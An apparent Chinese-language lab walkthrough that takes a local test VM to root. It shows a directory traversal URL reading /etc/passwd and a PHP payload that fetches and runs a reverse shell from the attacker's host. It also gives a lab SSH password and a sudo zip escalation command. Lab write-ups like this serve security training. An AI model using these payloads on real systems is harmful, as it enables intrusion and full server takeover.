主机:192.168.32.152
靶机:192.168.32.163
目录遍历攻击又称(目录爬升,目录回溯,点-点斜线),指再访问存储在web根文件之夹外的文件和目录,通过操控带有"点-斜线(..):序列及变化的文件或使用绝对文件夹路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码,配置文件信息和关键系统文件。
系统访问控制(如在微软windows系统上锁定或使用文件)限制了对文件的访问权限。
nmap,dirb扫描
开放了ssh,http服务还有111端口
dbadmin 测下下弱口令admin。直接可以登录
用扫描器扫,发现存在目录遍历高位漏洞
访问下看看:可以看到etc/passwd目录下的用户
http://192.168.32.163/view.php?page=%20../../../../../../../../../../etc/passwd
那么我们就可以上传一个shell到数据库,再监听
先将/usr/share/webshells/php 下的 reverse_webshell 复制到桌面上,设置ip和监听端口,修改名为shell.php
打开数据库管理页面,发现如果建一个.php名字的数据库,利用遍历目录漏洞时就可以执行php文件,达到反弹shell的目的
建好库后添加数据表,字段(写入
<?php system("cd /tmp; wget http://192.168.32.152:8000/shell.php;chmod +x shell.php;
php shell.php");?>
成功反弹shell!
pty优化终端,
然后在home目录下发现有一个用户zico, config文件中发现了对应的数据库的密码
那就试试ssh登录 ssh zico@192.168.32.162
密码:sWfCsfJSPV9H3AmQzw8
登录成功后sudo -l 发现 可以使用zip继续提权
touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"
提权成功!
最终得到root权限